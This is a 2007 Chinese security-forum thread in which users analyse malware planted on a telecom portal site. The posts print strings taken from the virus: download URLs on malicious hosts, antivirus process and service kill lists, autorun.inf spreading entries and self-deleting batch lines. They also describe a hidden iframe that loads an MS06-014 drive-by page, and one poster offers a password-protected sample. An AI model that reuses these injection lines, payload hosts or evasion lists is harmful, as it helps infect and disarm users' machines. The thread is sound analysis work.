费尔发现的一个毒网

mr_zhj

http://vnet.fscn.cn/

gggh

样本呢???

icka

病毒里的部分信息:

1. 
   
2. [url]http://www.wangzheqiaodan.com/girl/cmd.rar[/url] [url]http://www.wangzheqiaodan.com/girl/picture.htm[/url] e   BLACKSEEDER1.1 \Downloaded Program Files\ %s%.8X.exe kernel32.dll LoadLibraryA advapi32.dll SeDebugPrivilege OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges OpenSCManagerA EnumServicesStatusA DeleteService CloseServiceHandle ChangeServiceConfigA ControlService OpenServiceA VirtualAllocEx VirtualFreeEx CreateRemoteThread MSLOGON SOFTWARE\Microsoft\Windows\CurrentVersion\Run BSWNDCLS :try
   
3. del "%s"
   
4. if exist "%s" goto try
   
5. del "%s"
   
6. del %%0 open tmp.bat \WININIT.INI Rename NUL mcshield.exe
   
7. vstskmgr.exe
   
8. naprdmgr.exe
   
9. updaterui.exe
   
10. tbmon.exe
    
11. scan32.exe
    
12. ravmond.exe
    
13. ccenter.exe
    
14. ravtask.exe
    
15. rav.exe
    
16. ravmon.exe
    
17. ravmond.exe
    
18. ravstub.exe
    
19. kvxp.kxp
    
20. kvmonxp.kxp
    
21. kvcenter.kxp
    
22. kvsrvxp.exe
    
23. kregex.exe
    
24. uihost.exe
    
25. trojdie.kxp
    
26. frogagent.exe
    
27. 360Safe.exe
    
28. AST.exe 网镖 毒霸 瑞星 江民 天网 防火墙 卡巴斯基 超级巡警 安全卫士 木马克星 木马清道夫 symantec antivirus Autoruns winsock expert 进程管理 任务管理 注册表编辑器 系统配置实用程序 木马辅助查找器 VirusScan 超级兔子 优化大师 QQ病毒 iduba esteem procs 绿鹰PC 密码防盗 噬菌体 游戏木马检测大师 wrapped gift killer pjf(ustc)  kavsvc
    
29. AVP
    
30. AVPkavsvc
    
31. McAfeeFramework
    
32. McShield
    
33. McTaskManager
    
34. McAfeeFramework McShield
    
35. McTaskManager
    
36. navapsvc
    
37. KVWSC
    
38. KVSrvXP
    
39. Schedule
    
40. sharedaccess
    
41. RsCCenter
    
42. RsRavMon
    
43. RsCCenter
    
44. RsRavMon
    
45. wscsvc
    
46. KPfwSvc
    
47. SNDSrvc
    
48. ccProxy
    
49. ccEvtMgr
    
50. ccSetMgr
    
51. SPBBCSvc
    
52. Symantec
    
53. Core LC
    
54. NPFMntor
    
55. MskService
    
56. FireSvc
    
57. Alerter
    
58. %s <iframe src=%s width=0 height=0></iframe> \\%s \ GAMECFG.DAT administrator admin  [autorun]
    
59. open=%s
    
60. shellexecute=%s
    
61. shell\auto\command=%s
    
62. %s=%d
    
63. autorun %c:\%s autorun.inf BSDR1.1 \StringFileInfo\080404B0\CompanyName Microsoft Corporation *.* %c:\ BSDLL Program Files\Internet Explorer\IEXPLORE.EXE exe com scr bat cmd htm html asp aspx php                                                                                                                                                                    
    

复制代码

dikex

在网页中间用<iframe src=http://www.wangzheqiaodan.com/girl/picture.htm width=0 height=0></iframe>挂上了picture.htm，里面又是一个MS06-014网马（最近暴多！），下载http://www.wangzheqiaodan.com/girl/index.exe到临时文件夹，以IEXPL0RER.EXE命名，生成IEXPL0RER.VBS来执行IEXPL0RER.EXE

而这个IEXPL0RER.EXE（index.exe）是一个下载者，会下载下面的一堆毒！
http://www.wangzheqiaodan.com/girl/cmd.rar
http://www.wangzheqiaodan.com/girl/mm/cs.exe
http://1ll.diy.myrice.com/kb/CSKB0320.EXE
http://www.wangzheqiaodan.com/girl/mm/mh.exe
http://www.wangzheqiaodan.com/girl/mm/my.exe
http://www.wangzheqiaodan.com/girl/mm/wl.exe
http://www.wangzheqiaodan.com/girl/mm/wm.exe
http://www.wangzheqiaodan.com/girl/mm/wow.exe

唉，互连星空也被挂马了，电信实在是不行啊

样本，密码virus

[ 本帖最后由 dikex 于 2007-3-29 13:11 编辑 ]

mr_zhj

icka

看这架势,应该是个熊猫烧香难道?
就是病毒index.exe

1p1

AntiVir  Found TR/Agent.8900  
ArcaVir  Found Heur.Win32  
Avast  Found Win32:Tufik  
AVG Antivirus  Found Generic3.NWM  
BitDefender  Found Generic.Malware.SPBPkg.3A44090B  
ClamAV  Found nothing
Dr.Web  Found nothing
F-Prot Antivirus  Found nothing
F-Secure Anti-Virus  Found nothing
Fortinet  Found nothing
Kaspersky Anti-Virus  Found nothing
NOD32  Found probably unknown NewHeur_PE (probable variant)  
Norman Virus Control  Found nothing
Panda Antivirus  Found Trj/Wow.LF  
Rising Antivirus  Found nothing
VirusBuster  Found Trojan.DL.Tufik.C  
VBA32  Found nothing
所有佛山电信宽带用户均需要登录互联星空佛山专区网站才可享受以下互联星空优惠产品

dikex

原帖由 icka 于 2007-3-29 13:09 发表
看这架势,应该是个熊猫烧香难道?
就是病毒index.exe

index.exe是下载者来的

绅博周幸

都挂马了 强啊

dikex

而且全都是MS06-014网马